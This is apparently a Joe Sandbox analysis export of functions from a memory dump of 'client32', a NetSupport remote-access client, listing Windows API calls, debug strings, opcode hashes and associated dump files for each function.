                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Librarywsprintf$AddressFreeLoadProc
                                                                              • String ID: %02x$IPHLPAPI.DLL$SendARP
                                                                              • API String ID: 435568443-4085816232
                                                                              • Opcode ID: 369f9b8d5815293f31972576267f122e4637ba767a623a1c15d1d01a0f387f78
                                                                              • Instruction ID: 8760d0f24f13fbd9c3f6f7c142518e86b4ebf2eaea43770ddc67536ce621ef3a
                                                                              • Opcode Fuzzy Hash: 369f9b8d5815293f31972576267f122e4637ba767a623a1c15d1d01a0f387f78
                                                                              • Instruction Fuzzy Hash: DD217172E0011D9BCB14CFE6DD84AEEFBB4EF49A14F554118ED18A3300EB349905CBA0
                                                                              Function 110D2200 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 76synchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 110EE230: LocalAlloc.KERNEL32(00000040,00000014,?,1100D6AF,?), ref: 110EE240
                                                                                • Part of subcall function 110EE230: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,1100D6AF,?), ref: 110EE252
                                                                                • Part of subcall function 110EE230: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,1100D6AF,?), ref: 110EE264
                                                                              • _memset.LIBCMT ref: 110D225D
                                                                              • _strncpy.LIBCMT ref: 110D2270
                                                                              • CreateMutexA.KERNEL32(0000FFFF,00000000,110AECC7,AB86ACF8,0000FFFF,?,00000000), ref: 110D2282
                                                                              • OpenMutexA.KERNEL32(00100001,00000000,110AECC7), ref: 110D2296
                                                                              • GetLastError.KERNEL32 ref: 110D22A5
                                                                              • wsprintfA.USER32 ref: 110D22B9
                                                                              • OutputDebugStringA.KERNEL32(?), ref: 110D22C9
                                                                              Strings
                                                                              • CreateMutex() FAILED - mutex: %s (%d), xrefs: 110D22B3
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DescriptorMutexSecurity$AllocCreateDaclDebugErrorInitializeLastLocalOpenOutputString_memset_strncpywsprintf
                                                                              • String ID: CreateMutex() FAILED - mutex: %s (%d)
                                                                              • API String ID: 1226361317-2228366408
                                                                              • Opcode ID: 2384ea77c9b49aa6311800397e6ac125b36c4dd999786081d16b963adf27bd01
                                                                              • Instruction ID: 2d0f1180b9456f53bee9e3a362c2732001871efe099aa789405d963e56971bda
                                                                              • Opcode Fuzzy Hash: 2384ea77c9b49aa6311800397e6ac125b36c4dd999786081d16b963adf27bd01
                                                                              • Instruction Fuzzy Hash: 4521E0B6940358AFD710DFA4CC84FEABBBCEB48B14F00496AF92593644E770A644CB60
                                                                              Function 11023390 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 70windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItemTextA.USER32(?,?,?,00000100), ref: 110233C2
                                                                                • Part of subcall function 1101FFB0: wsprintfA.USER32 ref: 11020078
                                                                              • SetDlgItemTextA.USER32(?,?,11195264), ref: 110233FD
                                                                              • GetDlgItem.USER32(?,?), ref: 11023414
                                                                              • SetFocus.USER32(00000000), ref: 11023417
                                                                              • GetDlgItem.USER32(00000000,?), ref: 11023445
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 1102344A
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Item$Textwsprintf$EnableErrorExitFocusLastMessageProcessWindow
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                              • API String ID: 1605826578-1986719024
                                                                              • Opcode ID: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
                                                                              • Instruction ID: 8db35bf72fe99370d3eedeccbec7b94c25a8ea314d3c8a10113fa065dea7662b
                                                                              • Opcode Fuzzy Hash: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
                                                                              • Instruction Fuzzy Hash: F721BB79600718ABD724DBA1CC85FABF3BCEB84718F00445DF66697640CA74BC45CB64
                                                                              Function 11145120 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 67windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetMenuItemCount.USER32(?), ref: 1114513D
                                                                              • _memset.LIBCMT ref: 1114515E
                                                                              • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1114519B
                                                                              • CreatePopupMenu.USER32 ref: 111451AA
                                                                              • GetMenuItemCount.USER32(?), ref: 111451D3
                                                                              • InsertMenuItemA.USER32(?,00000000,00000001,00000030), ref: 111451E4
                                                                              • GetMenuItemCount.USER32(?), ref: 111451EB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Menu$Item$Count$CreateInfoInsertPopup_memset
                                                                              • String ID: 0
                                                                              • API String ID: 74472576-4108050209
                                                                              • Opcode ID: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
                                                                              • Instruction ID: c294618d83ba700a36b9fba62bf733376f49e09b6547452e6c31807948eb4840
                                                                              • Opcode Fuzzy Hash: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
                                                                              • Instruction Fuzzy Hash: 7A21AC7180022CABDB24DF50DC88BEEF7B8EB49719F0040A8E519A6540CBB45B84CFA0
                                                                              Function 11004019 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 66COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • EnableWindow.USER32(?,00000000), ref: 1100403D
                                                                              • ChooseFontA.COMDLG32(?), ref: 11004043
                                                                              • DeleteObject.GDI32(?), ref: 11004054
                                                                              • CreateFontIndirectA.GDI32(?), ref: 1100405E
                                                                              • InvalidateRect.USER32(00000000,00000000,00000001), ref: 110040AB
                                                                                • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                              • EnableWindow.USER32(00000000,00000001), ref: 110040D5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnableExitFontProcessWindow$ChooseCreateDeleteErrorIndirectInvalidateLastMessageObjectRect_strrchrwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 1877081333-2830328467
                                                                              • Opcode ID: 5a8ff3a3b695677d670fb872e9d6a603d23825acbc13e7a7cbff1a86c384b7c4
                                                                              • Instruction ID: 2c0d29b8726898d4e875131a5ddb42b893b31e3c9b3cc9d7239d82f15ed8fa9a
                                                                              • Opcode Fuzzy Hash: 5a8ff3a3b695677d670fb872e9d6a603d23825acbc13e7a7cbff1a86c384b7c4
                                                                              • Instruction Fuzzy Hash: 851181B5A4030ABBD724CBA1DCC6FDAF3A4FB48348F00456DF526A6584DB75B540C754
                                                                              Function 110441F0 Relevance: 13.7, APIs: 9, Instructions: 173COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _free.LIBCMT ref: 11044287
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                              • _free.LIBCMT ref: 110442A7
                                                                              • _strncpy.LIBCMT ref: 110442D5
                                                                              • _strncpy.LIBCMT ref: 11044312
                                                                              • _malloc.LIBCMT ref: 1104434C
                                                                              • _strncpy.LIBCMT ref: 1104435D
                                                                              • _strncpy.LIBCMT ref: 1104439F
                                                                              • _malloc.LIBCMT ref: 110443D2
                                                                              • _strncpy.LIBCMT ref: 110443E8
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _strncpy$_free_malloc$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 1102513549-0
                                                                              • Opcode ID: bd44c6ba14c597139a1bcf2485ccbb1e776856b1063963ef6c7a2147c4b94ce6
                                                                              • Instruction ID: 974b4f05892340fefa329837356e5b9fb129ea13f76464e8485f75d9f21f6bbc
                                                                              • Opcode Fuzzy Hash: bd44c6ba14c597139a1bcf2485ccbb1e776856b1063963ef6c7a2147c4b94ce6
                                                                              • Instruction Fuzzy Hash: 87616CB5D043559FD720DFB9C884BDAFBF9AF95308F0045AD9599D7200EAB0A980CFA1
                                                                              Function 11044090 Relevance: 13.6, APIs: 9, Instructions: 121COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsDlgButtonChecked.USER32(?,0000046F), ref: 110440DA
                                                                              • IsDlgButtonChecked.USER32(?,00000470), ref: 110440ED
                                                                              • DestroyCursor.USER32(?), ref: 11044171
                                                                              • DestroyCursor.USER32(?), ref: 1104417A
                                                                              • DestroyCursor.USER32(00000000), ref: 1104418E
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CursorDestroy$ButtonChecked
                                                                              • String ID:
                                                                              • API String ID: 2664327029-0
                                                                              • Opcode ID: 65e359f5a7e490632b0b05df749bb47df57bf5184124e9409809c9d7eebbec92
                                                                              • Instruction ID: d93bb8d91901fd52fc514ae9055c1649e3b087614cd6c7895e3b48934665d2c2
                                                                              • Opcode Fuzzy Hash: 65e359f5a7e490632b0b05df749bb47df57bf5184124e9409809c9d7eebbec92
                                                                              • Instruction Fuzzy Hash: 4531B6B6F00B01A7F710C675CCC1F9772D9AB94304F224539E679C7A90DA75E841C754
                                                                              Function 11113570 Relevance: 13.6, APIs: 9, Instructions: 77COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetStockObject.GDI32(00000003), ref: 111135A7
                                                                              • FillRect.USER32(?,?,00000000), ref: 111135C4
                                                                              • FillRect.USER32(?,?,00000000), ref: 111135D2
                                                                              • SetROP2.GDI32(?,00000007), ref: 111135FE
                                                                              • SetBkMode.GDI32(?,?), ref: 1111360A
                                                                              • SetBkColor.GDI32(?,?), ref: 11113615
                                                                              • SetTextColor.GDI32(?,?), ref: 11113620
                                                                              • SetTextJustification.GDI32(?,?,?), ref: 11113631
                                                                              • SetTextCharacterExtra.GDI32(?,?), ref: 1111363D
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Text$ColorFillRect$CharacterExtraJustificationModeObjectStock
                                                                              • String ID:
                                                                              • API String ID: 1094208222-0
                                                                              • Opcode ID: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
                                                                              • Instruction ID: 11fb3597ac11fe0070853bb1276331f7103533f07ae90b5f1526d6834acfdad0
                                                                              • Opcode Fuzzy Hash: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
                                                                              • Instruction Fuzzy Hash: CE2148B1D01128AFDB04DFA4D988AFEB7B8EF48315F104169FD15AB208D7746A01CBA0
                                                                              Function 110F0060 Relevance: 13.6, APIs: 9, Instructions: 70memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 110F0067
                                                                              • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,110F0E7E,?,?,AB86ACF8), ref: 110F009F
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 110F00AD
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocGlobalRelease
                                                                              • String ID:
                                                                              • API String ID: 1459782005-0
                                                                              • Opcode ID: ef8989bf252fcdced7cb56a846c0f82ac1b7e672def05fb6ebabdfad37a223a7
                                                                              • Instruction ID: 895e16ec520d13b6265c6dc70c6115b10cf0d765340dc232e34c0638dbe3d9ef
                                                                              • Opcode Fuzzy Hash: ef8989bf252fcdced7cb56a846c0f82ac1b7e672def05fb6ebabdfad37a223a7
                                                                              • Instruction Fuzzy Hash: BF113172A41228A7D3209B949DC9FDBB7ECEB4C716F000179FD19C3604E6755C0043E1
                                                                              Function 1103E3C0 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 319COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 1103E453
                                                                              • _memset.LIBCMT ref: 1103E461
                                                                              • _memmove.LIBCMT ref: 1103E46E
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • Part of subcall function 1103E140: Sleep.KERNEL32(000001F4,00000000,?,00000000,-111EE49C), ref: 1103E171
                                                                                • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
